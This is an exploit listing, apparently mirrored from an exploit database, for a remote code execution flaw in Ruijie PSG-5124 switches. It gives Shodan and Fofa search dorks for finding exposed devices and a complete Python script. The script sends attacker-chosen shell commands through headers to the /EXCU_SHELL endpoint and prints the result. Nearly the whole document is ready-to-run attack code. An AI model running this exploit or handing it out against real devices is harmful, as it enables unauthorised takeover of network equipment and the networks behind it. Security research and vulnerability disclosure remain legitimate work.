Share
## https://sploitus.com/exploit?id=PACKETSTORM:177570
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)  
#- Shodan Dork: http.html_hash:-1402735717  
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"  
#- Exploit Author: ByteHunter  
#- Email: 0xByteHunter@proton.me  
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)  
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)  
  
import http.client  
import argparse  
  
def send_request(ip, port, command):  
headers = {  
"Host": f"{ip}:{port}",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",  
"Accept-Language": "en-US,en;q=0.5",  
"Accept-Encoding": "gzip, deflate, br",  
"DNT": "1",  
"Connection": "close",  
"Upgrade-Insecure-Requests": "1",  
"Cmdnum": "1",  
"Confirm1": "n",  
"Content-Length": "0",  
"Command1": command  
}  
  
try:  
connection = http.client.HTTPConnection(f"{ip}:{port}")  
connection.request("GET", "/EXCU_SHELL", headers=headers)  
response = connection.getresponse()  
  
  
print(f"Status Code: {response.status}")  
print(response.read().decode('utf-8'))  
connection.close()  
  
except Exception as e:  
print(f"Request failed: {e}")  
  
if __name__ == "__main__":  
  
parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')  
parser.add_argument('--ip', help='Target IP address', required=True)  
parser.add_argument('--port', help='Port', required=True)  
parser.add_argument('--cmd', help='Command', required=True)  
args = parser.parse_args()  
  
  
ip = args.ip  
port = args.port  
command = args.cmd  
  
  
send_request(ip, port, command)